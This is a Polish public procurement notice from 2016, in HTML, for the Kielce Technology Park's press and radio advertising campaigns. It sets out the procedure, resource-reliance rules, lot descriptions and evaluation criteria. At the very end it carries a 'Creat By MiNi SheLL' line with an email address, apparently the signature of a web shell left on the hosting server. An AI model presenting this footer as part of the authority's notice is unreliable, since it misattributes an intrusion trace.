1.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
2.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.
3.	W celu oceny, czy wykonawca polegając na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, będzie dysponował tymi zasobami w stopniu niezbędnym dla należytego wykonania zamówienia publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, zamawiający żąda dokumentów, które określają w szczególności:
a)	zakres dostępnych wykonawcy zasobów innego podmiotu;
b)	sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy  wykonywaniu zamówienia publicznego; 
c)	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego; 
d)	czy inne podmioty, na zdolności, których wykonawca powołuje się w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizują roboty budowlane lub usługi, których wskazane zdolności dotyczą.
e)	Wykonawcy, który polega na zasobach innych podmiotów składa na wezwanie Zamawiającego dokumenty o których mowa w pkt. 9.4.4, w odniesieniu do tych podmiotów
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">W celu potwierdzenia braku podstaw do wykluczenia wykonawcy z postępowania, o których mowa w art. 24 ust. 1 pkt 23 ustawy, wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej, na której udostępniono SIWZ informacji o ofertach złożonych w postępowaniu zgodnie z art. 86 ust. 5 ustawy, składa stosownie do treści art. 24 ust. 11 ustawy, oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej oraz, w przypadku przynależności do tej samej grupy kapitałowej, dowody potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zgodnie z zapisami określonymi w SIWZ<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/09/2016, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Kampania prasowa <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Zadanie I - Kampania prasowa
1)	W ramach realizacji zadania - Wykonawca opracuje, zgodnie z wytycznymi Zamawiającego, 3 publikacje prasowe zwane dalej Publikacjami.
2)	Publikacje będą miały formę artykułu sponsorowanego. 
3)	Kampania prasowa realizowana będzie w prasie opiniotwórczej oraz branżowej o zasięgu ogólnopolskim, której wiodącymi tematami są: startupy, innowacyjność oraz nowoczesne technologie.
4)	Wykonawca przekaże Zamawiającemu projekty Publikacji w pliku pdf w terminie 15 dni roboczych przed planowaną datą emisji, zgodnie z zaakceptowanym przez Zamawiającego Planem kampanii. Zamawiający w terminie 2 dni roboczych od otrzymania projektu zgłosi ewentualne zastrzeżenia. Wykonawca w terminie 2 dni roboczych od momentu wniesienia przez Zamawiającego ewentualnych zastrzeżeń, naniesie stosowne poprawki i przekaże projekt do powtórnej akceptacji.
5)	Zaakceptowane Publikacje zostaną opublikowane w 3 różnych terminach, każda w nie mniej niż                                      2 magazynach/czasopismach o zasięgu ogólnopolskim i średnim miesięcznym nakładzie nie mniejszym niż 2.500 egzemplarzy.
6)	Dodatkowo Zamawiający oczekuje, że Publikacje zostaną zamieszczone w elektronicznych wersjach ww. magazynów/czasopism i będą dostępne dla czytelników przez okres min. 30 dni kalendarzowych.
Wymogi w zakresie Publikacji:
a)	format nie mniejszy niż  strony głównego grzbietu wydawnictwa lub dodatku tematycznego do wydawnictwa,
b)	tekst publikacji: minimum 3000 znaków (bez spacji), krój i wielkość czcionki tożsamy z materiałem tekstowym wydawnictwa, w którym Publikacja zostanie opublikowana,
c)	zastosowanie co najmniej 1 elementu graficznego (grafika i/lub zdjęcie) zgodnego z zasadami księgi CI Projektu, wielkość elementu graficznego minimum 15 % powierzchni artykułu,
d)	druk w pełnym kolorze (CMYK),
e)	terminy publikacji zgodnie z zaakceptowanym przez Zamawiającego Planem Kampanii,
f)	wersja elektroniczna Publikacji dostosowana wg standardów wydawnictwa. 
7)	Wszelkie koszty związane z opublikowaniem Publikacji ponosi Wykonawca.
8)	W ramach potwierdzenia wyników kampanii, Wykonawca przedstawi Zamawiającemu:
a)	potwierdzenie liczby sprzedanych egzemplarzy magazynu/czasopisma, w którym opublikowane zostały Publikacje, 
b)	po 3 egzemplarze magazynu/czasopisma, w którym opublikowane zostały Publikacje,
c)	zrzut z ekranu witryny internetowej, na której opublikowana została Publikacja.
9)	Dokumenty, o których mowa w pkt. 1. ppkt. 10) stanowić będą jedną z podstaw dokonania przez Zamawiającego odbioru Zamówienia.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>79341200-8, 79341100-7,
                    79340000-9,
                    79341400-0,
                    79416000-3,
                    79342200-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Proponowany format publikacji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Kampania radiowa<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1)	W ramach realizacji zadania Wykonawca opracuje 1 (jeden) spot radiowy, zgodnie z wytycznymi Zamawiającego.
2)	Zaakceptowany spot zostanie wyemitowany w sieciowych rozgłośniach radiowych z regionalną odsłoną posiadających największy zasięg terytorialny na terenie 9 (dziewięciu) województw o największej liczbie uczelni wyższych z pominięciem województw Polski Wschodniej tj. warmińsko-mazurskiego, podlaskiego, lubelskiego, świętokrzyskiego, podkarpackiego. 
3)	Spot musi zawierać informacje o Kieleckim parku Technologicznym jako animatorze projektu Platforma Startowa TechnoparkBiznesHub.
4)	Spot musi być opatrzony informacją o sfinansowaniu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rozwoju Regionalnego, Program Operacyjny Polska Wschodnia, Oś Priorytetowa I  Przedsiębiorcza Polska Wschodnia Działanie 1.1 Platformy startowe dla nowych pomysłów, Poddziałanie 1.1.1 Platformy startowe dla nowych pomysłów. Projekt: "Platforma Startowa - TechnoparkBiznesHub". 
5)	Minimalna liczba spotów w jednym województwie:  30 (słownie: trzydzieści) spotów.
6)	Czas trwania pojedynczego spotu: 30 (słownie: trzydzieści) sekund.
7)	Termin emisji spotu: emisja spotu realizowana będzie w okresie od poniedziałku do piątku w godzinach najwyższej słuchalności wg wcześniej zaakceptowanego przez Zamawiającego Planu Kampanii. Minimum 60% emisji musi odbywać się w ciągu 10 minut przed pełnymi serwisami informacyjnymi. 
8)	Scenariusz spotu: Wykonawca przygotuje i przedstawi Zamawiającemu propozycję treści spotu opracowaną zgodnie z założeniami koncepcji Kampanii.  
9)	Ścieżka dźwiękowa i lektor: Wykonawca zapewni ścieżkę dźwiękową i lektora do realizacji spotu 
w uzgodnieniu i akceptacji z Zamawiającym. Spot radiowy oraz jego elementy powinny zostać wyprodukowane w profesjonalnym standardzie i jakości wymaganej przy emisji spotów przez rozgłośnię radiową o zasięgu ponadregionalnym.
10)	Sposób przekazania materiałów: Wykonawca dostarczy Zamawiającemu na 14 dni przed emisją gotowe nagranie spotu na płycie DVD/CD w formacie umożliwiającym jego emisję w innej stacji radiowej o charakterze regionalnym i ponadregionalnym.
11)	Emisja musi zostać zapewniona w rozgłośniach radiowych, które:
a)	zasięgiem obejmują co najmniej teren całego województwa wybranego do przeprowadzenia kampanii,
b)	posiadają udokumentowany zasięg dzienny,
c)	posiadają udokumentowaną słuchalność ogólną w dni powszednie, powyżej 3 proc. w okresie styczeń-sierpień 2016 r. 
a)	W ramach potwierdzenia wyników kampanii, Wykonawca przedstawi Zamawiającemu tzw. ostatnią falę słuchalności = zasięg w grupie (tzn. ilość osób, do których dotarła emisja spotu reklamowego) oraz raport z emisji spotów
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>79341200-8, 79341100-7,
                    79340000-9,
                    79341400-0,
                    79416000-3,
                    92210000-6,
                    79342200-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Liczba spotów</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com